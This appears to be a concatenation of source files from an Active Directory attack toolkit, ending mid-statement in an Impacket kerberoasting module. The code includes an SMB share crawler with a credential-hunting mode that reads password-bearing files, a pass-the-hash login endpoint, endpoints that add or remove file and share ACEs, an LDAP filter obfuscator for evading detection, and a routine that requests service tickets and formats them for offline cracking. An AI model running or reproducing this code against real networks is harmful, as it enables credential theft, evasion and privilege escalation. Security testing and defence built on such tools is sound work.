					regex_pattern = re.compile(query, regex_flags)
				except re.error:
					return jsonify({'error': 'Invalid regex pattern'}), 400

			def is_credential_file(file_name):
				if not cred_hunt:
					return False
					
				file_lower = file_name.lower()
				
				# Check exact matches for special filenames
				if file_lower in special_files:
					return True
					
				# Check credential file patterns
				for pattern in credential_file_patterns:
					if fnmatch.fnmatch(file_lower, pattern):
						return True
						
				return False

			def should_check_content(file_name, file_size):
				if not content_search and not cred_hunt:
					return False
				
				if file_size > max_file_size:
					return False
				
				if is_credential_file(file_name):
					return True
					
				file_ext = os.path.splitext(file_name.lower())[1]
				return file_ext in file_extensions

			def search_content(file_path, item_name, item_details):
				try:
					file_content = smb_client.cat(share, file_path)
					if not file_content:
						return False
						
					is_credential_match = is_credential_file(item_name)
					if is_credential_match:
						item_details["match_type"] = "credential_file"
						item_details["is_credential_file"] = True
						
					try:
						# Try to decode as UTF-8 first
						text_content = file_content.decode('utf-8', errors='replace')
					except (UnicodeDecodeError, AttributeError):
						try:
							# If that fails, try Latin-1
							text_content = file_content.decode('latin-1', errors='replace')
						except:
							# If all fails, use raw bytes search
							if use_regex and regex_pattern:
								return bool(regex_pattern.search(str(file_content))) or is_credential_match
							else:
								return (query in str(file_content) if case_sensitive else query.lower() in str(file_content).lower()) or is_credential_match
					
					if use_regex and regex_pattern:
						match = regex_pattern.search(text_content)
						if match:
							# Add match context to the result
							start = max(0, match.start() - 50)
							end = min(len(text_content), match.end() + 50)
							match_context = text_content[start:end]
							item_details["content_match"] = match_context.strip()
							item_details["match_position"] = match.start()
							return True
					elif query:
						if case_sensitive:
							if query in text_content:
								# Find the first occurrence and add context
								pos = text_content.find(query)
								start = max(0, pos - 50)
								end = min(len(text_content), pos + len(query) + 50)
								match_context = text_content[start:end]
								item_details["content_match"] = match_context.strip()
								item_details["match_position"] = pos
								return True
						else:
							if query.lower() in text_content.lower():
								# Find the first occurrence and add context
								pos = text_content.lower().find(query.lower())
								start = max(0, pos - 50)
								end = min(len(text_content), pos + len(query) + 50)
								match_context = text_content[start:end]
								item_details["content_match"] = match_context.strip()
								item_details["match_position"] = pos
								return True
							
					return is_credential_match
				except Exception as e:
					logging.debug(f"[SMB CONTENT SEARCH] Error reading {file_path}: {str(e)}")
					return False

			def search_recursive(current_path, current_depth):
				if current_depth > depth:
					return
					
				if current_path in visited_paths:
					return
					
				visited_paths.add(current_path)
				
				path_log = current_path if current_path else '\\' 
				logging.debug(f"[SMB SEARCH] Searching {path_log} (depth {current_depth})")

				try:
					items = smb_client.ls(share, current_path)
					for item in items:
						item_name = item.get_longname()
						if item_name in ['.', '..']:
							continue

						temp_path = os.path.join(current_path, item_name)
						full_item_path = temp_path.replace('/', '\\') 
						if full_item_path.startswith('\\') and not current_path:
							full_item_path = full_item_path[1:]

						# Create item details dictionary
						item_details = {
							"name": item_name,
							"path": full_item_path,
							"is_directory": item.is_directory(),
							"size": item.get_filesize(),
							"created": str(item.get_ctime()),
							"modified": str(item.get_mtime()),
							"accessed": str(item.get_atime()),
							"share": share,
							"match_type": "name"
						}

						# Skip based on item type filter
						if (item_type == 'files' and item.is_directory()) or (item_type == 'directories' and not item.is_directory()):
							if item.is_directory():
								# Still search directories even if we're only looking for files
								search_recursive(full_item_path, current_depth + 1)
							continue

						# Check for credential files first
						if not item.is_directory() and cred_hunt and is_credential_file(item_name):
							cred_file_details = item_details.copy()
							cred_file_details["match_type"] = "credential_file"
							cred_file_details["is_credential_file"] = True
							logging.debug(f"[SMB SEARCH] Found credential file: {full_item_path}")
							found_items.append(cred_file_details)

						# Check filename match
						if query:
							name_match = False
							if use_regex and regex_pattern:
								name_match = bool(regex_pattern.search(item_name))
							else:
								if case_sensitive:
									name_match = fnmatch.fnmatch(item_name, query)
								else:
									name_match = fnmatch.fnmatch(item_name.lower(), query.lower())
							
							# Add item if filename matches
							if name_match:
								logging.debug(f"[SMB SEARCH] Found name match: {full_item_path}")
								found_items.append(item_details.copy())
						
						# Check content match for files only
						if not item.is_directory() and should_check_content(item_name, item.get_filesize()):
							content_match_details = item_details.copy()
							content_match_details["match_type"] = "content"
							
							if search_content(full_item_path, item_name, content_match_details):
								match_type = "content match" if "content_match" in content_match_details else "credential file"
								logging.debug(f"[SMB SEARCH] Found {match_type} in: {full_item_path}")
								found_items.append(content_match_details)

						# Continue recursion if it's a directory
						if item.is_directory():
							search_recursive(full_item_path, current_depth + 1)
				except Exception as e:
					error_paths.add(current_path)
					logging.debug(f"[SMB SEARCH] Error accessing path {current_path}: {str(e)}")

			search_recursive(start_path, 0)
			
			total_items = len(found_items)
			if cred_hunt:
				logging.info(f"[SMB SEARCH] Found {total_items} potential credential files/matches")
			else:
				logging.info(f"[SMB SEARCH] Found {total_items} matching items for '{query}'")
			
			if error_paths:
				logging.debug(f"[SMB SEARCH] Encountered access errors in {len(error_paths)} paths")
			
			return jsonify({
				'items': found_items,
				'total': total_items,
				'search_info': {
					'pattern': query,
					'search_mode': mode,
					'case_sensitive': case_sensitive,
					'content_search': content_search,
					'cred_hunt': cred_hunt,
					'share': share,
					'host': host,
					'max_depth': depth,
					'item_type': item_type,
					'paths_searched': len(visited_paths),
					'error_paths': len(error_paths),
					'file_extensions_searched': file_extensions if content_search else None
				}
			})

		except Exception as e:
			logging.error(f"[SMB SEARCH] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_login_as(self):
		"""Handles requests to the /api/login_as endpoint."""
		try:
			data = request.json
			username = data.get('username')
			password = data.get('password')
			domain = data.get('domain')
			lmhash = data.get('lmhash')
			nthash = data.get('nthash')
			auth_aes_key = data.get('auth_aes_key')

			if not username:
				return jsonify({'error': 'Username is required'}), 400

			success = self.powerview.login_as(
				username=username,
				password=password,
				domain=domain,
				lmhash=lmhash,
				nthash=nthash,
				auth_aes_key=auth_aes_key
			)

			if success:
				try:
					current_identity = self.powerview.conn.who_am_i()
					message = f"Successfully logged in as {current_identity}"
					connection_info = {
						'domain': self.powerview.domain,
						'username': self.powerview.conn.get_username(),
						'is_admin': self.powerview.is_admin,
						'status': 'OK' if self.powerview.is_connection_alive() else 'KO',
						'protocol': self.powerview.conn.get_proto(),
						'ldap_address': self.powerview.conn.get_ldap_address(),
						'nameserver': self.powerview.conn.get_nameserver(),
					}
					return jsonify({'status': 'success', 'message': message, 'connection_info': connection_info}), 200
				except Exception as inner_e:
					logging.error(f"Error fetching identity after login_as for {username}: {str(inner_e)}")
					return jsonify({'status': 'success', 'message': f"Login attempt for {username} processed, but failed to confirm new identity."}), 200
			else:
				message = f"Failed to login as {username}@{domain or self.powerview.domain}. Check credentials or permissions."
				logging.warning(message)
				return jsonify({'status': 'failure', 'error': message}), 401 # Use 401 for authentication failure

		except Exception as e:
			logging.error(f"Unexpected exception during login_as for {username}: {str(e)}")
			return jsonify({'error': f"An unexpected error occurred during login: {str(e)}"}), 500

	def handle_smb_sessions(self):
		try:
			# Get SMB session statistics from the connection pool
			stats = self.powerview.conn.get_smb_session_stats()
			
			# Convert to the expected format for the frontend
			sessions = {}
			if 'hosts' in stats:
				for host, host_stats in stats['hosts'].items():
					sessions[host] = {
						'computer': host,
						'connected': host_stats.get('is_alive', False),
						'authenticated': True,  # If it's in the pool, it's authenticated
						'last_used': host_stats.get('last_used', 0),
						'use_count': host_stats.get('use_count', 0),
						'age': host_stats.get('age', 0)
					}
			
			return jsonify({'sessions': sessions})
		except Exception as e:
			logging.error(f"Error fetching SMB sessions: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_search_stream(self):
		"""Server-Sent Event progressive search wrapper around handle_smb_search logic."""
		try:
			# Grab and normalise parameters from query-string
			args = request.args
			host = args.get('computer', '').lower()
			share = args.get('share')
			query = args.get('query', '')
			start_path = args.get('start_path', '')
			depth = int(args.get('depth', 3))
			use_regex = args.get('use_regex', 'false').lower() == 'true'
			content_search = args.get('content_search', 'false').lower() == 'true'
			case_sensitive = args.get('case_sensitive', 'false').lower() == 'true'
			cred_hunt = args.get('cred_hunt', 'false').lower() == 'true'
			item_type = args.get('item_type', 'all')

			if not host or not share:
				return jsonify({'error': 'Computer and share are required'}), 400

			try:
				client = self.powerview.conn.init_smb_session(host)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)

			# Prepare helpers
			import re, fnmatch, os
			regex_pattern = None
			if use_regex and query:
				flags = re.MULTILINE | (0 if case_sensitive else re.IGNORECASE)
				try:
					regex_pattern = re.compile(query, flags)
				except re.error:
					return jsonify({'error': 'Invalid regex pattern'}), 400

			def name_match(filename):
				if not query:
					return False
				if use_regex and regex_pattern:
					return bool(regex_pattern.search(filename))
				if case_sensitive:
					return fnmatch.fnmatch(filename, query)
				return fnmatch.fnmatch(filename.lower(), query.lower())

			def content_match(path, filename):
				if not content_search and not cred_hunt:
					return False, None
				try:
					blob = smb_client.cat(share, path)
					if not blob:
						return False, None
					try:
						text = blob.decode('utf-8', errors='replace')
					except Exception:
						text = str(blob)

					if cred_hunt:
						return True, None
					if query:
						if use_regex and regex_pattern:
							m = regex_pattern.search(text)
							if m:
								return True, text[m.start():m.end()+100]
						else:
							needle = query if case_sensitive else query.lower()
							hay = text if case_sensitive else text.lower()
							idx = hay.find(needle)
							if idx != -1:
								return True, text[idx:idx+100]
					return False, None
				except Exception:
					return False, None

			def event_stream():
				visited = set()
				stack = [(start_path, 0)]
				total = 0
				while stack:
					current_path, cur_depth = stack.pop()
					if cur_depth > depth or current_path in visited:
						continue
					visited.add(current_path)
					try:
						items = smb_client.ls(share, current_path)
					except Exception:
						continue
					for itm in items:
						name = itm.get_longname()
						if name in ['.', '..']:
							continue
						full_path = os.path.join(current_path, name).replace('/', '\\')
						if full_path.startswith('\\') and not current_path:
							full_path = full_path[1:]

						is_directory = itm.is_directory()
						item_details = {
							'name': name,
							'path': full_path,
							'is_directory': is_directory,
							'size': itm.get_filesize(),
							'share': share,
							'match_type': 'name'
						}

						# Skip based on item type filter
						if (item_type == 'files' and is_directory) or (item_type == 'directories' and not is_directory):
							if is_directory:
								# Still search directories even if we're only looking for files
								stack.append((full_path, cur_depth + 1))
							continue

						matched = False
						if name_match(name):
							matched = True
						elif not is_directory:
							cm, ctx = content_match(full_path, name)
							if cm:
								matched = True
								item_details['match_type'] = 'content'
								if ctx:
									item_details['content_match'] = ctx

						if matched:
							yield f"data: {json.dumps({'type':'found','item': item_details})}\n\n"
							total += 1

						if is_directory:
							stack.append((full_path, cur_depth + 1))

				yield f"data: {json.dumps({'type':'done','total': total})}\n\n"

			headers = {
				'Content-Type': 'text/event-stream',
				'Cache-Control': 'no-cache',
				'X-Accel-Buffering': 'no'
			}
			return Response(stream_with_context(event_stream()), headers=headers)
		except Exception as e:
			logging.error(f"[SMB SEARCH STREAM] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_properties(self):
		try:
			data = request.json
			computer = data.get('computer').lower()
			share = data.get('share')
			path = data.get('path')

			if not computer or not share:
				return jsonify({'error': 'Missing required parameters'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first'}), 400

			smb_client = SMBClient(client)

			if not path:
				share_info = smb_client.share_info(share)
				def convert_bytes(obj):
					if isinstance(obj, dict):
						return {k: convert_bytes(v) for k, v in obj.items()}
					elif isinstance(obj, list):
						return [convert_bytes(i) for i in obj]
					elif isinstance(obj, bytes):
						return obj.decode('utf-8')
					return obj
				share_info = convert_bytes(share_info)
				if share_info.get('sd_info'):
					share_info['owner'] = self.powerview.convertfrom_sid(share_info['sd_info'].get('OwnerSid'))
					share_info['group'] = self.powerview.convertfrom_sid(share_info['sd_info'].get('GroupSid'))
					share_info['dacl'] = share_info['sd_info'].get('Dacl')
					for ace in share_info['dacl'] or []:
						ace['trustee'] = self.powerview.convertfrom_sid(ace['trustee'])
				return jsonify(share_info)

			try:
				file_info = smb_client.get_file_info(share, path)
				file_info['owner'] = self.powerview.convertfrom_sid(file_info['sd_info']['OwnerSid'])
				file_info['group'] = self.powerview.convertfrom_sid(file_info['sd_info']['GroupSid'])
				file_info['dacl'] = file_info['sd_info']['Dacl']
				for ace in file_info['dacl']:
					ace['trustee'] = self.powerview.convertfrom_sid(ace['trustee'])
				for ts_field in ['created', 'modified', 'accessed']:
					if ts_field in file_info:
						try:
							ts_str = file_info[ts_field]
							file_info[ts_field + '_formatted'] = ts_str
						except Exception as e:
							logging.debug(f"Could not format timestamp {ts_field}: {str(e)}")
				try:
					path = path.replace('/', '\\')
					file_info['full_path'] = f"\\\\{computer}\\{share}\\{path}"
					file_info['computer'] = computer
					file_info['share'] = share
				except Exception as attr_err:
					logging.warning(f"Could not get additional file attributes: {str(attr_err)}")
				return jsonify(file_info)
			except Exception as e:
				return jsonify({'error': f'Failed to get file properties: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB PROPERTIES] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_set_security(self):
		try:
			data = request.json
			computer = data.get('computer', '').lower()
			share = data.get('share')
			path = data.get('path')
			username = data.get('username')
			mask = data.get('mask', 'fullcontrol').lower()
			ace_type = data.get('ace_type', 'allow').lower()
			
			if not all([computer, share, path, username]):
				return jsonify({'error': 'Missing required parameters. Computer, share, path, and username are required.'}), 400
				
			if ace_type not in ['allow', 'deny']:
				return jsonify({'error': 'Invalid ace_type. Must be "allow" or "deny".'}), 400

			if mask not in ['fullcontrol', 'modify', 'readandexecute', 'readandwrite', 'read', 'write']:
				return jsonify({'error': 'Invalid mask. Must be "fullcontrol", "modify", "readandexecute", "readandwrite", "read", or "write".'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first.'}), 400

			if is_valid_sid(username):
				sid = username
			else:
				sid = self.powerview.convertto_sid(username)
			
			if sid is None or not is_valid_sid(sid):
				return jsonify({'error': f'Username {username} is not found in the domain. Use a SID instead.'}), 400

			smb_client = SMBClient(client)
			
			try:
				result = smb_client.set_file_security(share, path, sid, ace_type, mask)
				if result:
					return jsonify({'status': 'success', 'message': 'File security set successfully'}), 200
				else:
					return jsonify({'error': 'Failed to set file security'}), 500
			except Exception as e:
				return jsonify({'error': f'Failed to set file security: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB SET SECURITY] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_remove_security(self):
		try:
			data = request.json
			computer = data.get('computer', '').lower()
			share = data.get('share')
			path = data.get('path')
			username = data.get('username')
			mask = data.get('mask')
			ace_type = data.get('ace_type')
			
			if not all([computer, share, path, username]):
				return jsonify({'error': 'Missing required parameters. Computer, share, path, and username are required.'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first.'}), 400

			if is_valid_sid(username):
				sid = username
			else:
				sid = self.powerview.convertto_sid(username)
			
			if sid is None or not is_valid_sid(sid):
				return jsonify({'error': f'Username {username} is not found in the domain. Use a SID instead.'}), 400

			smb_client = SMBClient(client)
			
			try:
				result = smb_client.remove_file_security(share, path, sid, mask, ace_type)
				if result:
					return jsonify({'status': 'success', 'message': 'ACE removed successfully'}), 200
				else:
					return jsonify({'error': 'No matching ACEs found to remove'}), 404
			except Exception as e:
				return jsonify({'error': f'Failed to remove ACE: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB REMOVE SECURITY] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_set_share_security(self):
		try:
			data = request.json
			computer = data.get('computer', '').lower()
			share = data.get('share')
			username = data.get('username')
			mask = data.get('mask', 'fullcontrol').lower()
			ace_type = data.get('ace_type', 'allow').lower()
			
			if not all([computer, share, username]):
				return jsonify({'error': 'Missing required parameters. Computer, share, and username are required.'}), 400
				
			if ace_type not in ['allow', 'deny']:
				return jsonify({'error': 'Invalid ace_type. Must be "allow" or "deny".'}), 400

			if mask not in ['fullcontrol', 'modify', 'readandexecute', 'readandwrite', 'read', 'write']:
				return jsonify({'error': 'Invalid mask. Must be "fullcontrol", "modify", "readandexecute", "readandwrite", "read", or "write".'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first.'}), 400

			if is_valid_sid(username):
				sid = username
			else:
				sid = self.powerview.convertto_sid(username)
			
			if sid is None or not is_valid_sid(sid):
				return jsonify({'error': f'Username {username} is not found in the domain. Use a SID instead.'}), 400

			smb_client = SMBClient(client)
			
			try:
				result = smb_client.set_share_security(share, sid, mask, ace_type)
				if result:
					permission_name = mask.title().replace('and', ' & ')
					action = 'granted' if ace_type == 'allow' else 'denied'
					return jsonify({
						'status': 'success', 
						'message': f'{permission_name} permission {action} for {username} on share {share}'
					}), 200
				else:
					return jsonify({'error': 'Failed to set share security'}), 500
			except Exception as e:
				return jsonify({'error': f'Failed to set share security: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB SET SHARE SECURITY] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500

	def handle_smb_remove_share_security(self):
		try:
			data = request.json
			computer = data.get('computer', '').lower()
			share = data.get('share')
			username = data.get('username')
			mask = data.get('mask')
			ace_type = data.get('ace_type')
			
			if not all([computer, share, username]):
				return jsonify({'error': 'Missing required parameters. Computer, share, and username are required.'}), 400

			try:
				client = self.powerview.conn.init_smb_session(computer)
			except Exception as e:
				return jsonify({'error': 'No active SMB session. Please connect first.'}), 400

			if is_valid_sid(username):
				sid = username
			else:
				sid = self.powerview.convertto_sid(username)
			
			if sid is None or not is_valid_sid(sid):
				return jsonify({'error': f'Username {username} is not found in the domain. Use a SID instead.'}), 400

			smb_client = SMBClient(client)
			
			try:
				result = smb_client.remove_share_security(share, sid, mask, ace_type)
				if result:
					return jsonify({'status': 'success', 'message': 'Share security removed successfully'}), 200
				else:
					return jsonify({'error': 'No matching ACEs found to remove'}), 404
			except Exception as e:
				return jsonify({'error': f'Failed to remove share security: {str(e)}'}), 500

		except Exception as e:
			logging.error(f"[SMB REMOVE SHARE SECURITY] Error: {str(e)}")
			return jsonify({'error': str(e)}), 500


#!/usr/bin/env python3
import random
import string
import binascii

from ..core.constants import (
	WILDCARD, EXCEPTION_CHARS, ATTRIBUTE_OID, EXCEPTION_ATTRIBUTES
)

def in_exception(attribute):
	attribute_casefolded = attribute.casefold()

	in_exception_attributes = attribute_casefolded in (e.casefold() for e in EXCEPTION_ATTRIBUTES)
	in_exception_oid = attribute_casefolded in (val.casefold() for val in ATTRIBUTE_OID.values())

	return in_exception_attributes or in_exception_oid

class LdapObfuscate:
	@staticmethod
	def random_spaces(min_spaces=0, max_spaces=3):
		return ' ' * random.randint(min_spaces, max_spaces)

	@staticmethod
	def is_number(value):
		if not value:
			return False
		return value.lstrip('-').isdigit()

	@staticmethod
	def randhex(chars):
		if not chars:
			return chars
			
		result = []
		for i in range(len(chars)):
			if chars[i] == WILDCARD or LdapObfuscate.is_number(chars[i]):
				result.append(chars[i])
			else:
				result.append(
					random.choice(
						[
							chars[i],
							"\\{}".format(binascii.hexlify(chars[i].encode('utf-8')).decode('utf-8'))
						]
					)
				)

		return ''.join(result)

	@staticmethod
	def casing(chars):
		if not chars:
			return chars
			
		result = []
		for i in range(len(chars)):
			if chars[i] in string.ascii_letters:
				result.append(random.choice([chars[i].lower(), chars[i].upper()]))
			else:
				result.append(chars[i])

		return ''.join(result)

	@staticmethod
	def get_context_aware_spacing(prev_char, next_char):
		"""
		Helper method to determine appropriate spacing based on context
		Handles None values for prev_char and next_char
		"""
		prev_char = str(prev_char) if prev_char is not None else ''
		next_char = str(next_char) if next_char is not None else ''
		
		if prev_char in EXCEPTION_CHARS or next_char in EXCEPTION_CHARS:
			return ""
			
		if prev_char in '&|!=><' or next_char in '&|!=><':
			return LdapObfuscate.random_spaces(1, 3)
			
		if prev_char in '()' or next_char in '()':
			return LdapObfuscate.random_spaces(0, 1)
			
		return LdapObfuscate.random_spaces(0, 2)

	@staticmethod
	def random_anr_casing():
		"""
		Returns 'anr' with random casing
		"""
		anr = "anr"
		return ''.join(random.choice([c.upper(), c.lower()]) for c in anr)

	@staticmethod
	def random_case_string(text, probability=0.7):
		"""
		Randomly change case of characters in string with given probability.
		Following Go helpers.RandomlyChangeCaseString pattern.
		"""
		if not text:
			return text
		
		result = []
		for char in text:
			if char.isalpha() and random.random() < probability:
				result.append(random.choice([char.upper(), char.lower()]))
			else:
				result.append(char)
		
		return ''.join(result)

	@staticmethod
	def prepend_zeros_to_number(value, max_zeros):
		"""Prepend random number of zeros to numeric value"""
		if not value or not value.isdigit():
			return value
		num_zeros = random.randint(1, max_zeros)
		return '0' * num_zeros + value

	@staticmethod
	def prepend_zeros_to_sid(value, max_zeros):
		"""Prepend zeros to SID components"""
		if not value or not value.startswith("S-"):
			return value
		
		parts = value.split('-')
		if len(parts) < 3:
			return value
		
		for i in range(2, len(parts)):
			if parts[i].isdigit() and random.choice([True, False]):
				num_zeros = random.randint(1, max_zeros)
				parts[i] = '0' * num_zeros + parts[i]
		
		return '-'.join(parts)

	@staticmethod
	def add_spacing_to_value(value, attr_type, max_spaces):
		"""Add context-aware spacing to values based on attribute type"""
		if not value:
			return value
		
		if attr_type == "dn":
			parts = value.split(',')
			spaced_parts = []
			for part in parts:
				if '=' in part:
					key, val = part.split('=', 1)
					spaces = ' ' * random.randint(0, max_spaces)
					spaced_parts.append(f"{key.strip()}{spaces}={spaces}{val.strip()}")
				else:
					spaced_parts.append(part)
			return ','.join(spaced_parts)
		
		elif attr_type == "sid":
			if value.startswith("S-"):
				parts = value.split('-')
				spaced_parts = [parts[0]]
				for part in parts[1:]:
					spaces = ' ' * random.randint(0, max_spaces)
					spaced_parts.append(spaces + part + spaces)
				return '-'.join(spaced_parts)
		
		elif attr_type == "anr":
			spaces = ' ' * random.randint(0, max_spaces)
			return spaces + value + spaces
		
		return value 


RESOURCE = 'Resource'
RESOURCE_FACTORY = 'ResourceFactory'
ENUMERATION = 'Enumeration'
ACCOUNT_MANAGEMENT = 'AccountManagement'
TOPOLOGY_MANAGEMENT = 'TopologyManagement'

OPERATIONAL_ATTRIBUTES = {
    "rootDomainNamingContext",
    "namingContexts",
    "defaultNamingContext",
    "schemaNamingContext",
    "configurationNamingContext",
    "dnsHostName",
    "ldapServiceName",
    "supportedLDAPVersion",
    "supportedControl",
    "supportedCapabilities",
    "supportedSASLMechanisms",
    "domainControllerFunctionality",
    "forestFunctionality",
    "domainFunctionality",
    "highestCommittedUSN",
    "isSynchronized",
    "isGlobalCatalogReady",
    "currentTime"
}

COMMON_ATTRIBUTES = [
    "objectClass",
    "objectGUID",
    "objectSid",
    "sAMAccountName",
    "dnsHostName",
    "servicePrincipalName",
    "userPrincipalName",
    "memberOf",
    "member",
    "distinguishedName",
]

from .core.server import Server
from .core.connection import Connection



from sys import platform
if platform == "linux" or platform == "linux2":
	import gnureadline as readline
else:
	import readline

def get_shell_history(last,unique):
	'''return the last x number of {,unique} shell history'''
	hist_len = readline.get_current_history_length()-1
	if last > hist_len:
		last = hist_len
	returnable_hist_items = []
	cursor = hist_len
	while (not len(returnable_hist_items) == last) and (not cursor == 1):
		analyze_this = readline.get_history_item(cursor)
		if unique == True:
			if not analyze_this in returnable_hist_items:
				returnable_hist_items.append(analyze_this)
		else:
			returnable_hist_items.append(analyze_this)
		cursor = cursor - 1
	return returnable_hist_items



#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
#   This module will try to find Service Principal Names that are associated with normal user account.
#   Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request
#   will encrypt the ticket with the account the SPN is running under, this could be used for an offline
#   bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
#   This is part of the kerberoast attack researched by Tim Medin (@timmedin) and detailed at
#   https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
#
#   Original idea of implementing this in Python belongs to @skelsec and his
#   https://github.com/skelsec/PyKerberoast project
#
#   This module provides a Python implementation for this attack, adding also the ability to PtH/Ticket/Key.
#   Also, disabled accounts won't be shown.
#
# Author:
#   Alberto Solino (@agsolino)
#
# ToDo:
#   [X] Add the capability for requesting TGS and output them in JtR/hashcat format
#   [X] Improve the search filter, we have to specify we don't want machine accounts in the answer
#       (play with userAccountControl)
#

from __future__ import division
from __future__ import print_function
import argparse
import logging
import sys
import json
from datetime import datetime
from binascii import hexlify, unhexlify

from pyasn1.codec.der import decoder
from impacket import version
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.examples import logger
from impacket.examples.utils import parse_credentials
from impacket.krb5 import constants
from impacket.krb5.asn1 import TGS_REP
from impacket.krb5.ccache import CCache
from impacket.krb5.types import Principal
from impacket.ldap import ldap, ldapasn1
from impacket.smbconnection import SMBConnection
from impacket.ntlm import compute_lmhash, compute_nthash

from powerview.lib.kerberosv5 import getKerberosTGT, getKerberosTGS

class GetUserSPNs:
    @staticmethod
    def printTable(items, header):
        colLen = []
        for i, col in enumerate(header):
            rowMaxLen = max([len(row[i]) for row in items])
            colLen.append(max(rowMaxLen, len(col)))

        outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])

        # Print header
        print(outputFormat.format(*header))
        print('  '.join(['-' * itemLen for itemLen in colLen]))

        # And now the rows
        for row in items:
            print(outputFormat.format(*row))

    def __init__(self, username, password, user_domain, target_domain, cmdLineOptions, identity=None, options=None, encType=None, TGT=None):
        self.__username = username
        self.__password = password
        self.__domain = user_domain
        self.__targetDomain = target_domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__aesKey = cmdLineOptions.auth_aes_key
        self.__doKerberos = cmdLineOptions.use_kerberos
        self.__requestTGS = True
        self.__kdcHost = cmdLineOptions.dc_ip
        self.__TGT = TGT
        self.__requestUser = identity
        if cmdLineOptions.hashes is not None:
            self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')

        # Create the baseDN
        domainParts = self.__targetDomain.split('.')
        self.baseDN = ''
        for i in domainParts:
            self.baseDN += 'dc=%s,' % i
        # Remove last ','
        self.baseDN = self.baseDN[:-1]
        # We can't set the KDC to a custom IP when requesting things cross-domain
        # because then the KDC host will be used for both
        # the initial and the referral ticket, which breaks stuff.
        if user_domain != target_domain and self.__kdcHost:
            logging.warning('DC ip will be ignored because of cross-domain targeting.')
            self.__kdcHost = None

        #opsec options
        self.__encryption = encType
        self.__options = options

    def getMachineName(self):
        if self.__kdcHost is not None and self.__targetDomain == self.__domain:
            s = SMBConnection(self.__kdcHost, self.__kdcHost)
        else:
            s = SMBConnection(self.__targetDomain, self.__targetDomain)
        try:
            s.login('', '')
        except Exception:
            if s.getServerName() == '':
                raise 'Error while anonymous logging into %s'
        else:
            try:
                s.logoff()
            except Exception:
                # We don't care about exceptions here as we already have the required
                # information. This also works around the current SMB3 bug
                pass
        return "%s.%s" % (s.getServerName(), s.getServerDNSDomainName())

    def getTGT(self, encType):
        if self.__doKerberos:
            domain, _, TGT, _ = CCache.parseFile(self.__domain)
            if TGT is not None:
                return TGT
        # No TGT in cache, request it
        userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

        # In order to maximize the probability of getting session tickets with RC4 etype, we will convert the
        # password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the
        # cleartext password.
        # If no clear text password is provided, we just go with the defaults.
        if self.__password != '' and (self.__lmhash == '' and self.__nthash == ''):
            try:
                tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,
                                                                compute_lmhash(self.__password),
                                                                compute_nthash(self.__password), self.__aesKey,
                                                                kdcHost=self.__kdcHost, encType=encType)
            except Exception as e:
                logging.debug('TGT: %s' % str(e))
                tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
                                                                    unhexlify(self.__lmhash),
                                                                    unhexlify(self.__nthash), self.__aesKey,
                                                                    kdcHost=self.__kdcHost, encType=encType)

        else:
            tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
                                                                unhexlify(self.__lmhash),
                                                                unhexlify(self.__nthash), self.__aesKey,
                                                                kdcHost=self.__kdcHost, encType=encType)
        TGT = {}
        TGT['KDC_REP'] = tgt
        TGT['cipher'] = cipher
        TGT['sessionKey'] = sessionKey
        return TGT

    def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
        decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]

        # According to RFC4757 (RC4-HMAC) the cipher part is like:
        # struct EDATA {
        #       struct HEADER {
        #               OCTET Checksum[16];
        #               OCTET Confounder[8];
        #       } Header;
        #       OCTET Data[0];
        # } edata;
        #
        # In short, we're interested in splitting the checksum and the rest of the encrypted data
        #
        # Regarding AES encryption type (AES128 CTS HMAC-SHA1 96 and AES256 CTS HMAC-SHA1 96)
        # last 12 bytes of the encrypted ticket represent the checksum of the decrypted 
        # ticket
        if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
            entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
                constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
